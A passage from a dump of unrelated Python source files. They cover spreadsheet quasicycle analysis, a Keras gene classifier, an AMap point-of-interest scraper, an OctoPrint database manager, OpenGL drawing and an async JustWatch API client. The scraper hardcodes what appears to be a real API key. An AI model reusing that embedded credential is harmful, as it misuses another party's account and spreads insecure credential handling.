config.start_col + 1).value is not None:\n sheet.cell(current_row, config.start_col + 2).value = sheet.cell(current_row + 1, config.start_col + 1).value\n current_row += 1\n\n\ndef distance(point1, point2):\n square_x = (point2[0] - point1[0]) ** 2\n square_y = (point2[1] - point1[1]) ** 2\n dist = (square_x + square_y) ** 0.5\n return dist\n\n\ndef check_near(points_list, time_check, position, next_num, min_value):\n while time_check != 0:\n try:\n if distance(points_list[position], points_list[position + next_num + 1]) < min_value:\n min_value = distance(points_list[position], points_list[position + next_num + 1])\n next_num += 1\n time_check -= 1\n except IndexError:\n break\n return min_value, next_num\n\n\ndef get_quasicycles(sheet, config):\n quasicycles = []\n points_list = []\n row = config.start_row\n while sheet.cell(row, 3).value is not None:\n points_list.append([sheet.cell(row, 2).value, sheet.cell(row, 3).value])\n row += 1\n position = 0\n q_index = 1\n while position + config.min_size < len(points_list) - 1:\n q_size = config.min_size\n min_value = distance(points_list[position], points_list[q_size + position])\n time_check = 3\n min_value, q_size = check_near(points_list, time_check, position, q_size, min_value)\n if q_size == q_size + time_check:\n while distance(points_list[position], points_list[position + q_size + 1]) < min_value:\n min_value = distance(points_list[position], points_list[position + q_size])\n q_size += 1\n quasicycles.append(Quasicycle(sheet, \"Квазицикл \" + str(q_index), position + config.start_row, 2, q_size))\n position = position + q_size + 1\n q_index += 1\n return quasicycles\n\n\ndef create_squares_graph(quasicycles):\n sort_quasi = []\n order = 1\n for quasicycle in quasicycles:\n sort_quasi.append([order, quasicycle.square])\n order += 1\n sort_quasi = np.array(sort_quasi)\n sort_quasi.reshape(2, order - 1)\n k_means = KMeans(n_clusters=3)\n k_means.fit(sort_quasi)\n y_k_means = k_means.predict(sort_quasi)\n fig, ax = plt.subplots()\n ax.scatter(sort_quasi[:, 0], sort_quasi[:, 1], c=y_k_means, s=50, cmap='viridis')\n plt.title('График движений площадей прямоугольников')\n plt.xlabel('Номер квазицикла')\n plt.ylabel('Площадь квазицикла')\n fig.savefig('squares.png')\n # plt.show()\n","sub_path":"libs.py","file_name":"libs.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"391449554","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\nimport numpy\r\nimport numpy as np\r\nimport csv\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten, Activation, LSTM\r\nfrom keras.layers.convolutional import Convolution2D\r\nfrom keras.layers.convolutional import MaxPooling2D\r\nfrom keras.optimizers import SGD\r\nfrom sklearn.cross_validation import train_test_split\r\nimport matplotlib.pyplot as plt\r\nfrom keras.utils import np_utils\r\nfrom keras import optimizers\r\n# fix random seed for reproducibility\r\nseed = 7\r\nnumpy.random.seed(seed)\r\n# load data\r\ndataset=csv.reader(open('train.csv','r'))\r\n\r\n#print dataset\r\nX_train= np.zeros((2000,14))\r\nY_train= np.zeros((2000,1))\r\nj=0\r\nfor data in dataset:\r\n if j>=1: \r\n temp= data[1]\r\n #print (temp)\r\n Y_train[j-1]=data[2]\r\n i=0\r\n for element in temp:\r\n #print (element)\r\n if element=='A':\r\n X_train[j-1][i]=-1\r\n i=i+1\r\n if element=='C':\r\n X_train[j-1][i]=-0.5\r\n i=i+1\r\n if element=='G':\r\n X_train[j-1][i]=0.5\r\n i=i+1\r\n if element=='T':\r\n X_train[j-1][i]=1\r\n i=i+1\r\n j=j+1 \r\n# ACGT\r\nx= np.zeros((2000,14,1))\r\ny= np.zeros((2000,1))\r\nindices = np.arange(2000)# indices = the number of images in the source data set \r\nnp.random.shuffle(indices) \r\nfor i in indices: \r\n x[i,:,0] = X_train[i,:] \r\n y[i] =Y_train[i] \r\n \r\n#k=0\r\n#while k<1000000:\r\n# l=random.randint(0, 1999)\r\n# m=random.randint(0, 1999)\r\n# if l !=m:\r\n # Y_train[l], Y_train[m]=Y_train[m], Y_train[l]\r\n # X_train[l,:], X_train[m,:]=X_train[m,:], X_train[l,:]\r\n #k=k+1\r\n#dataset = numpy.loadtxt(\"train.csv\", delimiter=\",\")\r\n# reshape to be [samples][pixels][width][height]\r\n#rmsprop=optimizers.RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)\r\n#sgd = SGD(lr=0.15, decay=1e-6, momentum=0, nesterov=True)\r\ndef SimpleMLP_model():\r\n\t# create model\r\n model = Sequential()\r\n model.add(LSTM(2, input_shape=(14,1))) \r\n model.add(Activation('relu'))\r\n model.add(Dropout(0.35))\r\n model.add(Dense(1))\r\n model.add(Activation('sigmoid'))\r\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n return model\r\n\r\nmodel = SimpleMLP_model()\r\nM=1800\r\nhistory=model.fit(x[0:M,:,:], y[0:M],validation_data=(x[M+1:1999,:,:], y[M+1:1999]), nb_epoch=1000, batch_size=50)\r\n#history=model.fit(X_train[0:M,:], Y_train[0:M],validation_data=(X_train[M+1:1999,:], Y_train[M+1:1999]), nb_epoch=50, batch_size=1)\r\n#scores = model.evaluate(X_test, y_test, verbose=0)\r\n#print(\"Baseline Error: %.2f%%\" % (100-scores[1]*100))\r\nmodel.save('gene.h5') \r\n\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.legend(['train','validation'], loc='upper right')\r\nplt.title('binary_crossentropy')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.show()\r\n\r\nplt.plot(history.history['acc'])\r\nplt.plot(history.history['val_acc'])\r\nplt.legend(['train','validation'], loc='lower right')\r\nplt.title('accuracy')\r\nplt.ylabel('accuracy')\r\nplt.xlabel('epoch')\r\nplt.show()","sub_path":"Gene_LSTM.py","file_name":"Gene_LSTM.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"3525945","text":"\r\nimport urllib.request\r\nimport json\r\nimport math\r\n\r\napikey='254bfd619e12538e278002388d0e2564'\r\npolygon_range='114.048818088108,22.548716905382|114.048855523004,22.528410644532|114.06902859158,22.528449164497|114.068712565105,22.548912760417|114.048818088108,22.548716905382'\r\nkeywords=''\r\nPOI_types='050300' #change here to get diffrent types of poi\r\n\r\noffset='20'\r\ndisplayed_page='1'\r\nextension='base'\r\noutputfile=POI_types+'.txt'\r\n\r\n#for coordinate system transformation\r\nx_pi = 3.14159265358979324 * 3000.0 / 180.0\r\npi = 3.1415926535897932384626 # π\r\na = 6378245.0 # 长半轴\r\nee = 0.00669342162296594323 # 扁率\r\n\r\n#get full url to request api\r\ndef url_amap_polygon(apikey,polygon_range,keywords,POI_types,offset,displayed_page,extension):\r\n fullurl='http://restapi.amap.com/v3/place/polygon?key='+apikey+'&polygon='+polygon_range+'&keywords='+keywords+'&types='+POI_types+'&offset='+offset+'&page='+displayed_page+'&extensions='+extension\r\n return fullurl\r\n\r\n#send a request, and get result\r\ndef request_result(url):\r\n response = urllib.request.urlopen(url, timeout=1)\r\n html = response.read()\r\n decode_html = html.decode('utf-8')\r\n result = json.loads(decode_html)\r\n status=result['status']\r\n if status=='0':\r\n print('failed to get poi')\r\n\r\n return result\r\n#check number of pages\r\ndef get_pagenumber(result,offset):\r\n pageset=int(offset)\r\n count =result['count']\r\n count_number=int(count)\r\n if (count_number%pageset)==0:\r\n pagenumber=int(count_number/pageset)\r\n else:\r\n pagenumber = int(count_number /pageset) + 1\r\n return pagenumber\r\n\r\n#get longitude and latitude from a string\r\ndef getlongitude(location):\r\n\r\n List_longitude=[]\r\n List_location=list(location)\r\n\r\n for charecter in List_location:\r\n\r\n if (charecter==','):\r\n locationnumber=List_location.index(charecter)\r\n\r\n List_longitude=List_location[:locationnumber]\r\n\r\n break\r\n longitude=''.join(List_longitude)\r\n float_longitude=float(longitude)\r\n return float_longitude\r\n\r\ndef getlatitude(location):\r\n\r\n List_latitude=[]\r\n List_location=list(location)\r\n for charecter in List_location:\r\n if (charecter==','):\r\n locationnumber=List_location.index(charecter)\r\n List_latitude=List_location[locationnumber+1:]\r\n\r\n break\r\n latitude=''.join(List_latitude)\r\n float_latitude=float(latitude)\r\n return float_latitude\r\n\r\n#transform coordinate system\r\ndef gcj02towgs84(lng, lat):\r\n \"\"\"\r\n GCJ02(火星坐标系)转GPS84\r\n :param lng:火星坐标系的经度\r\n :param lat:火星坐标系纬度\r\n :return:\r\n \"\"\"\r\n\r\n dlat = transformlat(lng - 105.0, lat - 35.0)\r\n dlng = transformlng(lng - 105.0, lat - 35.0)\r\n radlat = lat / 180.0 * pi\r\n magic = math.sin(radlat)\r\n magic = 1 - ee * magic * magic\r\n sqrtmagic = math.sqrt(magic)\r\n dlat = (dlat * 180.0) / ((a * (1 - ee)) / (magic * sqrtmagic) * pi)\r\n dlng = (dlng * 180.0) / (a / sqrtmagic * math.cos(radlat) * pi)\r\n mglat = lat + dlat\r\n mglng = lng + dlng\r\n return [lng * 2 - mglng, lat * 2 - mglat]\r\n\r\ndef transformlat(lng, lat):\r\n ret = -100.0 + 2.0 * lng + 3.0 * lat + 0.2 * lat * lat + \\\r\n 0.1 * lng * lat + 0.2 * math.sqrt(math.fabs(lng))\r\n ret += (20.0 * math.sin(6.0 * lng * pi) + 20.0 *\r\n math.sin(2.0 * lng * pi)) * 2.0 / 3.0\r\n ret += (20.0 * math.sin(lat * pi) + 40.0 *\r\n math.sin(lat / 3.0 * pi)) * 2.0 / 3.0\r\n ret += (160.0 * math.sin(lat / 12.0 * pi) + 320 *\r\n math.sin(lat * pi / 30.0)) * 2.0 / 3.0\r\n return ret\r\n\r\ndef transformlng(lng, lat):\r\n ret = 300.0 + lng + 2.0 * lat + 0.1 * lng * lng + \\\r\n 0.1 * lng * lat + 0.1 * math.sqrt(math.fabs(lng))\r\n ret += (20.0 * math.sin(6.0 * lng * pi) + 20.0 *\r\n math.sin(2.0 * lng * pi)) * 2.0 / 3.0\r\n ret += (20.0 * math.sin(lng * pi) + 40.0 *\r\n math.sin(lng / 3.0 * pi)) * 2.0 / 3.0\r\n ret += (150.0 * math.sin(lng / 12.0 * pi) + 300.0 *\r\n math.sin(lng / 30.0 * pi)) * 2.0 / 3.0\r\n return ret\r\n\r\n\r\n#first request, a test request to get page number\r\nurl=url_amap_polygon(apikey,polygon_range,keywords,POI_types,offset,displayed_page,extension)\r\nresult=request_result(url)\r\npagenumber=get_pagenumber(result,offset)\r\nprint(pagenumber)\r\n\r\n#formal start, and record\r\nwith open(outputfile,'w',encoding='utf-8') as text_file:\r\n\r\n for i in range(pagenumber):\r\n row_count=0\r\n page=i+1\r\n str_page=str(page)\r\n url=url_amap_polygon(apikey,polygon_range,keywords,POI_types,offset,str_page,extension)\r\n result=[]\r\n result=request_result(url)\r\n\r\n for item in result['pois']:\r\n jname=item['name']\r\n jtypecode=item['typecode']\r\n jaddress=item['address']\r\n jlocation=item['location']\r\n jlon=getlongitude(jlocation)\r\n jlat=getlatitude(jlocation)\r\n wgs84location=gcj02towgs84(jlon,jlat)\r\n wgs84lon=wgs84location[0]\r\n wgs84lat=wgs84location[1]\r\n\r\n print(jname,'!',jtypecode,'!',jaddress,'!',wgs84lon,'!',wgs84lat,file=text_file) # ! to seperate text into column in excel\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":".gitignore/testPOI.py","file_name":"testPOI.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"335302702","text":"# coding=utf-8\nfrom __future__ import absolute_import\n\nimport logging\nimport os\nimport sqlite3\n\nfrom octoprint_PrintJobHistory.WrappedLoggingHandler import WrappedLoggingHandler\nfrom octoprint_PrintJobHistory.models.FilamentModel import FilamentModel\nfrom octoprint_PrintJobHistory.models.PrintJobModel import PrintJobModel\nfrom octoprint_PrintJobHistory.models.PluginMetaDataModel import PluginMetaDataModel\nfrom octoprint_PrintJobHistory.models.TemperatureModel import TemperatureModel\nfrom peewee import *\n\n\nFORCE_CREATE_TABLES = False\nSQL_LOGGING = True\n\nCURRENT_DATABASE_SCHEME_VERSION = 1\n\n# List all Models\nMODELS = [PluginMetaDataModel, PrintJobModel, FilamentModel, TemperatureModel]\n\n\nclass DatabaseManager(object):\n\n\tdef __init__(self, parentLogger):\n\t\tself._logger = logging.getLogger(parentLogger.name + \".\" + self.__class__.__name__)\n\t\tself._sqlLogger = logging.getLogger(parentLogger.name + \".\" + self.__class__.__name__ + \".SQL\")\n\n\t\tself._database = None\n\t\tself._databaseFileLocation = None\n\t\tself._sendDataToClient = None\n\n\t################################################################################################## private functions\n\n\tdef _createOrUpgradeSchemeIfNecessary(self):\n\t\tschemeVersionFromDatabaseModel = None\n\t\ttry:\n\t\t\tschemeVersionFromDatabaseModel = PluginMetaDataModel.get(PluginMetaDataModel.key == PluginMetaDataModel.KEY_DATABASE_SCHEME_VERSION)\n\t\t\tpass\n\t\texcept Exception as e:\n\t\t\terrorMessage = e.message\n\t\t\tif errorMessage.startswith(\"no such table\"):\n\n\t\t\t\tself._logger.info(\"Create database-table, because didn't exists\")\n\t\t\t\tself._createDatabaseTables()\n\t\t\telse:\n\t\t\t\tself._logger.error(str(e))\n\n\t\tif not schemeVersionFromDatabaseModel == None:\n\t\t\tcurrentDatabaseSchemeVersion = int(schemeVersionFromDatabaseModel.value)\n\t\t\tif (currentDatabaseSchemeVersion < CURRENT_DATABASE_SCHEME_VERSION):\n\t\t\t\t# evautate upgrade steps (from 1-2 , 1...6)\n\t\t\t\tself._logger.info(\"We need to upgrade the database scheme from: '\" + str(currentDatabaseSchemeVersion) + \"' to: '\" + str(CURRENT_DATABASE_SCHEME_VERSION) + \"'\")\n\t\t\t\tself._logger.info(\"...not needed/implemented...\")\n\t\t\t\tpass\n\t\tpass\n\n\t\t# databaseSchemeVersion = PluginMetaDataEntity.getDatabaseSchemeVersion(cursor)\n\t\t# if databaseSchemeVersion == None or FORCE_CREATE_TABLES == True:\n\t\t# \tself._createCurrentTables(cursor, FORCE_CREATE_TABLES)\n\t\t# else:\n\t\t# \t# check from which version we need to upgrade\n\t\t# \t#\tsql\n\t\t# \tpass\n\tdef _createDatabaseTables(self):\n\t\tself._database.connect(reuse_if_open=True)\n\t\tself._database.drop_tables(MODELS)\n\t\tself._database.create_tables(MODELS)\n\n\t\tPluginMetaDataModel.create(key=PluginMetaDataModel.KEY_DATABASE_SCHEME_VERSION, value=CURRENT_DATABASE_SCHEME_VERSION)\n\t\tself._database.close()\n\t\tself._logger.info(\"Database tables created\")\n\n\t################################################################################################### public functions\n\t# datapasePath '/Users/o0632/Library/Application Support/OctoPrint/data/PrintJobHistory'\n\tdef initDatabase(self, databasePath, sendErrorMessageToClient):\n\t\tself._logger.info(\"Init DatabaseManager\")\n\t\tself.sendErrorMessageToClient = sendErrorMessageToClient\n\t\tself._databaseFileLocation = os.path.join(databasePath, \"printJobHistory.db\")\n\n\t\tself._logger.info(\"Creating database in: \" + str(self._databaseFileLocation))\n\t\tif SQL_LOGGING == True:\n\t\t\timport logging\n\t\t\tlogger = logging.getLogger('peewee')\n\t\t\t# we need only the single logger without parent\n\t\t\tlogger.parent = None\n\t\t\t# logger.addHandler(logging.StreamHandler())\n\t\t\t# activate SQL logging on PEEWEE side and on PLUGIN side\n\t\t\tlogger.setLevel(logging.DEBUG)\n\t\t\tself._sqlLogger.setLevel(logging.DEBUG)\n\n\t\t\twrappedHandler = WrappedLoggingHandler(self._sqlLogger)\n\t\t\tlogger.addHandler(wrappedHandler)\n\n\t\tself._createDatabase(FORCE_CREATE_TABLES)\n\n\t\tpass\n\n\tdef _createDatabase(self, forceCreateTables):\n\t\tself._database = SqliteDatabase(self._databaseFileLocation)\n\t\tDatabaseManager.db = self._database\n\t\tself._database.bind(MODELS)\n\n\t\tif forceCreateTables:\n\t\t\tself._logger.info(\"Creating new database-tables, because FORCE == TRUE!\")\n\t\t\tself._createDatabaseTables()\n\t\telse:\n\t\t\t# check, if we need an scheme upgrade\n\t\t\tself._logger.info(\"Check if database-scheme upgrade needed.\")\n\t\t\tself._createOrUpgradeSchemeIfNecessary()\n\t\tself._logger.info(\"Done DatabaseManager\")\n\n\n\tdef getDatabaseFileLocation(self):\n\t\treturn self._databaseFileLocation\n\n\tdef recreateDatabase(self):\n\t\tself._createDatabase(True)\n\n\tdef insertPrintJob(self, printJobModel):\n\t\tdatabaseId = None\n\t\twith self._database.atomic() as transaction: # Opens new transaction.\n\t\t\ttry:\n\t\t\t\tprintJobModel.save()\n\t\t\t\tdatabaseId = printJobModel.get_id()\n\t\t\t\t# save all relations\n\t\t\t\t# - Filament\n\t\t\t\tfor filamentModel in printJobModel.getFilamentModels():\n\t\t\t\t\tfilamentModel.printJob = printJobModel\n\t\t\t\t\tfilamentModel.save()\n\t\t\t\t# - Temperature\n\t\t\t\tfor temperatureModel in printJobModel.getTemperatureModels():\n\t\t\t\t\ttemperatureModel.printJob = printJobModel\n\t\t\t\t\ttemperatureModel.save()\n\t\t\t\t# do expicit commit\n\t\t\t\ttransaction.commit()\n\t\t\texcept Exception as e:\n\t\t\t\t# Because this block of code is wrapped with \"atomic\", a\n\t\t\t\t# new transaction will begin automatically after the call\n\t\t\t\t# to rollback().\n\t\t\t\ttransaction.rollback()\n\t\t\t\tself._logger.exception(\"Could not insert printJob into database:\" + str(e))\n\n\t\t\t\tself.sendErrorMessageToClient(\"DatabaseManager\", \"Could not insert the printjob into the database. See OctoPrint.log for details!\")\n\t\t\tpass\n\n\t\treturn databaseId\n\n\tdef updatePrintJob(self, printJobModel):\n\t\twith self._database.atomic() as transaction: # Opens new transaction.\n\t\t\ttry:\n\t\t\t\tprintJobModel.save()\n\t\t\t\tdatabaseId = printJobModel.get_id()\n\t\t\t\t# save all relations\n\t\t\t\t# - Filament\n\t\t\t\tfor filamentModel in printJobModel.getFilamentModels():\n\t\t\t\t\tfilamentModel.save()\n\n\t\t\t\t# # - Temperature\n\t\t\t\t# for temperatureModel in printJobModel.getTemperatureModels():\n\t\t\t\t# \ttemperatureModel.printJob = printJobModel\n\t\t\t\t# \ttemperatureModel.save()\n\t\t\texcept Exception as e:\n\t\t\t\t# Because this block of code is wrapped with \"atomic\", a\n\t\t\t\t# new transaction will begin automatically after the call\n\t\t\t\t# to rollback().\n\t\t\t\ttransaction.rollback()\n\t\t\t\tself._logger.exception(\"Could not update printJob into database:\" + str(e))\n\t\t\t\tself.sendErrorMessageToClient(\"DatabaseManager\", \"Could not update the printjob ('\"+ printJobModel.fileName +\"') into the database. See OctoPrint.log for details!\")\n\t\t\tpass\n\n\tdef countPrintJobsByQuery(self, tableQuery):\n\n\t\tfilterName = tableQuery[\"filterName\"]\n\n\t\tmyQuery = PrintJobModel.select()\n\t\tif (filterName == \"onlySuccess\"):\n\t\t\tmyQuery = myQuery.where(PrintJobModel.printStatusResult == \"success\")\n\t\telif (filterName == \"onlyFailed\"):\n\t\t\tmyQuery = myQuery.where(PrintJobModel.printStatusResult != \"success\")\n\n\t\treturn myQuery.count()\n\n\n\tdef loadPrintJobsByQuery(self, tableQuery):\n\t\toffset = int(tableQuery[\"from\"])\n\t\tlimit = int(tableQuery[\"to\"])\n\t\tsortColumn = tableQuery[\"sortColumn\"]\n\t\tsortOrder = tableQuery[\"sortOrder\"]\n\t\tfilterName = tableQuery[\"filterName\"]\n\n\t\tmyQuery = PrintJobModel.select().offset(offset).limit(limit)\n\t\tif (filterName == \"onlySuccess\"):\n\t\t\tmyQuery = myQuery.where(PrintJobModel.printStatusResult == \"success\")\n\t\telif (filterName == \"onlyFailed\"):\n\t\t\tmyQuery = myQuery.where(PrintJobModel.printStatusResult != \"success\")\n\n\t\tif (\"printStartDateTime\" == sortColumn):\n\t\t\tif (\"desc\" == sortOrder):\n\t\t\t\tmyQuery = myQuery.order_by(PrintJobModel.printStartDateTime.desc())\n\t\t\telse:\n\t\t\t\tmyQuery = myQuery.order_by(PrintJobModel.printStartDateTime)\n\t\tif (\"fileName\" == sortColumn):\n\t\t\tif (\"desc\" == sortOrder):\n\t\t\t\tmyQuery = myQuery.order_by(PrintJobModel.fileName.desc())\n\t\t\telse:\n\t\t\t\tmyQuery = myQuery.order_by(PrintJobModel.fileName)\n\t\treturn myQuery\n\n\tdef loadAllPrintJobs(self):\n\t\treturn PrintJobModel.select().order_by(PrintJobModel.printStartDateTime.desc())\n\n\t\t# return PrintJobModel.select().offset(offset).limit(limit).order_by(PrintJobModel.printStartDateTime.desc())\n\t\t# all = PrintJobModel.select().join(FilamentModel).switch(PrintJobModel).join(TemperatureModel).order_by(PrintJobModel.printStartDateTime.desc())\n\t\t# allDict = all.dicts()\n\t\t# result = prefetch(allJobsQuery, FilamentModel)\n\t\t# return result\n\t\t# return allDict\n\n\tdef loadPrintJob(self, databaseId):\n\t\treturn PrintJobModel.get_by_id(databaseId)\n\n\tdef deletePrintJob(self, databaseId):\n\n\n\t\twith self._database.atomic() as transaction: # Opens new transaction.\n\t\t\ttry:\n\t\t\t\t# first delete relations\n\t\t\t\tn = FilamentModel.delete().where(FilamentModel.printJob == databaseId).execute()\n\t\t\t\tn = TemperatureModel.delete().where(TemperatureModel.printJob == databaseId).execute()\n\n\t\t\t\tPrintJobModel.delete_by_id(databaseId)\n\t\t\texcept Exception as e:\n\t\t\t\t# Because this block of code is wrapped with \"atomic\", a\n\t\t\t\t# new transaction will begin automatically after the call\n\t\t\t\t# to rollback().\n\t\t\t\ttransaction.rollback()\n\t\t\t\tself._logger.exception(\"Could not delete printJob from database:\" + str(e))\n\n\t\t\t\tself.sendErrorMessageToClient(\"DatabaseManager\", \"Could not update the printjob ('\"+ str(databaseId) +\"') into the database. See OctoPrint.log for details!\")\n\t\t\tpass\n","sub_path":"octoprint_PrintJobHistory/DatabaseManager.py","file_name":"DatabaseManager.py","file_ext":"py","file_size_in_byte":9119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"487552714","text":"from OpenGL.GL import *\r\nfrom OpenGL.GLUT import *\r\nimport movement\r\n\r\nangleMINE = 0\r\n\r\nCHANGE_COLOR = 0\r\nxx = 0\r\n\r\n\r\ndef set_c():\r\n global xx\r\n xx = 1\r\n\r\n\r\ndef x():\r\n global angleMINE, z, xx\r\n global CHANGE_COLOR\r\n z = movement.GetPosition()\r\n # ناقص جلوبال الحاجات اللي بتلففه لو هتحطها هنا\r\n # + اقرى كومنت الفانكشن اللي بعد دي\r\n glColor3f(1, CHANGE_COLOR, CHANGE_COLOR)\r\n glTranslate(-z, 0.5, 0) # TRANSLATE IN RESPONSE TO\r\n glRotate(angleMINE, 0, 1, 0) # TO ROTATE\r\n glRotate(90, 1, 0, 0) # TO DRAW OUR TOURUS IN WANTED VIEW \" قبل كدة كان بيترسم عمودي مش نايم على الارضية \"\r\n\r\n glutSolidTorus(0.2, 1.2, 5, 5)\r\n\r\n glColor3f(1, 0, 0)\r\n if xx:\r\n glColor3f(0, 0, 0)\r\n glutSolidSphere(0.5, 10, 10)\r\n if 1 >= CHANGE_COLOR >= 0:\r\n CHANGE_COLOR += 0.05\r\n if CHANGE_COLOR >= 1:\r\n CHANGE_COLOR = 0\r\n angleMINE += 3 # HERE THE ANGLE TO ROTATE THE TORUS\r\n\r\n\r\ndef draw_model():\r\n # مستخدم الروتيت هنا عشان انا فوق كنت برسم الموديل بيتحرك في x والحركة بتاعتنا كلها في z بس\r\n # ف أي تعديل فوق في دوران الموديل على الطريق ولا حاجة هتبقى x بدل z وهي هنا هتتغير تلقائي\r\n n = movement.getRotate()\r\n glRotate(n * 45, 0, 0, 1)\r\n glRotate(90, 0, 1, 0)\r\n x()\r\n","sub_path":"game/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"352025192","text":"# We don't know enough about neural network.\n# In ind_datagen.py, I will construct some extremely simplified neural network\n# and data sets to explore the properties of NN.\n#\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom torch.autograd import Variable\nimport torch.optim\nimport numpy as np\nfrom amne.amnesia import AverageMeter\nimport time\nimport pickle\n\n# Experiment 1\n# Dimension filtering\n\n\nclass Filter(nn.Module):\n def __init__(self):\n super(Filter, self).__init__()\n self.lin1=nn.Linear(100,100)\n self.lin2=nn.Linear(100,100)\n self.lin3=nn.Linear(100,1)\n\n def forward(self,input):\n\n x=self.lin1(input)\n x=F.relu(x)\n x=self.lin2(x)\n x=F.relu(x)\n x=self.lin3(x)\n return x\n\ndef train(data_loader,model,criterion,optimizer,epoch):\n end=time.time()\n for i,(input,target) in enumerate(data_loader):\n input=Variable(input.cuda())\n target=Variable(target.cuda())\n target=target.float()\n\n output=model(input)\n loss=criterion(output,target)\n batch_loss.update(loss.data[0],input.size(0))\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n batch_time.update(time.time()-end)\n end=time.time()\n print_freq=10\n\n if i%print_freq==0:\n print(\"Epoch:[{0:4}][{1:3}/{2:3}]\\t\"\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'.format(\n epoch, i, len(data_loader), batch_time=batch_time,\n loss=batch_loss))\n\n\nif __name__==\"__main__\":\n\n input=np.random.normal(size=(200000,100))\n target=3*input[:,0]+7*input[:,1]\n input=torch.Tensor(input)\n target=torch.FloatTensor(target)\n ds=TensorDataset(input,target)\n dl=DataLoader(ds,batch_size=1024,shuffle=True)\n\n model=Filter().cuda()\n criterion = nn.SmoothL1Loss().cuda()\n optimizer=torch.optim.Adam(model.parameters(),lr=0.001)\n\n batch_time=AverageMeter()\n batch_loss=AverageMeter()\n epochs=200\n\n model.train()\n\n for epoch in range(epochs):\n train(dl,model,criterion,optimizer,epoch)\n\n pickle.dump(model.state_dict(),open(\"last_model_linear.pickle\",'wb'))\n","sub_path":"analysis/ind_datagen.py","file_name":"ind_datagen.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"61343177","text":"import asyncio\nimport aiohttp\n\n\nclass Request:\n base = \"https://apis.justwatch.com/content\"\n\n def __init__(self, method, endpoint, **kwargs):\n self.method = method\n\n self.params = kwargs.pop(\"params\", None)\n self.data = kwargs.pop(\"data\", None)\n self.json = kwargs.pop(\"json\", None)\n self.headers = kwargs.pop(\"headers\", None)\n\n if endpoint:\n endpoint = endpoint.lstrip(\"/\")\n self.url = f\"{self.base}/{endpoint}\"\n\n @property\n def kwargs(self):\n return dict(\n params=self.params, data=self.data, json=self.json, headers=self.headers\n )\n\n\nclass HTTP:\n def __init__(self, client, *, session=None, loop=None):\n self.client = client\n self.loop = loop or asyncio.get_event_loop()\n self.session = session or aiohttp.ClientSession(loop=self.loop)\n self.locale = None\n\n async def request(self, req, *, override=False):\n if not self.locale and not override:\n await self.client._initialize()\n async with self.session.request(\n req.method, req.url.format(locale=self.locale), **req.kwargs\n ) as resp:\n if resp.status == 200:\n return await resp.json()\n resp.raise_for_status()\n\n async def get_locale(self):\n return await self.request(Request(\"GET\", \"locales/state\"), override=True)\n\n async def search(self, payload):\n return await self.request(\n Request(\"POST\", \"titles/{locale}/popular\", json=payload)\n )\n\n async def get_genres(self):\n return await self.request(Request(\"GET\", \"genres/locale/{locale}\"))\n\n async def get_providers(self):\n return await self.request(Request(\"GET\", \"providers/locale/{locale}\"))\n\n async def get_certifications(self, content_type):\n params = dict(country=self.client.country, object_type=content_type)\n return await self.request(Request(\"GET\", \"age_certifications\", params=params))\n\n async def get_item(self, id, content_type):\n return await self.request(\n Request(\n \"GET\",\n \"titles/{content_type}/{id}/locale/{{locale}}\".format(\n content_type=content_type, id=id\n ),\n )\n )\n\n async def get_season(self, id):\n return await self.request(\n Request(\"GET\", \"titles/show_season/{id}/locale/{{locale}}\".format(id=id))\n )\n","sub_path":"asyncjw/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"492134044","text":"\n### Importing various python libraries\n# numpy is a useful toolkit for scientific computations\nimport numpy as np\n# matplotlib is a plotting toolkit\nimport matplotlib.pyplot as plt\n\n\n\nimport matplotlib\nfrom IPython.display import HTML, Image\nmatplotlib.rc('animation', html='html5')\n# import matplotlib.patches as patches\n\nimport matplotlib.pylab as pylab\nparams = {'legend.fontsize': 'large',\n 'figure.figsize': (12.8, 7.2),\n 'xtick.labelsize':'14',\n 'ytick.labelsize':'14'}\npylab.rcParams.update(params)\nfrom matplotlib.collections import PatchCollection\nimport matplotlib.patches as patches\n\nimport sys\nsys.path.append('../')\n\n# Function used to setup ploting area.\nimport setup_plot_area as spa\n\n########################## SET PARAMETERS HERE #############################\n\n# depth of earthquake in km\ndepth_earthquake = 0\n\nradius = 6371 # radius of Earth in km\n\ntitle = 'Movie title'\n\n\n# epi_dist=70\n# theta_earthquake=50\n# LL_L1_text='Earthquake waves travel outwards in all\\n directions from where an earthquake happens'\n# LL_L2_text='These waves can tell us about the material\\n they travel through on their journey'\n# LR_L1_text='\\\"I look at the time it takes for P waves to\\n arrive back at the Earth’s surface\\\"'\n# LR_L2_text='\\\"I image where the mantle is hotter or colder\\n by measuring the variable speeds of the waves\\\"'\n# load_image='Cartoons/Al_from_group_name.png'\n\n# epi_dist=60\n# theta_earthquake=-32\n# LL_L1_text='S-waves are one type of wave that travel\\n outwards in all directions from an earthquake'\n# LL_L2_text='They bounce off 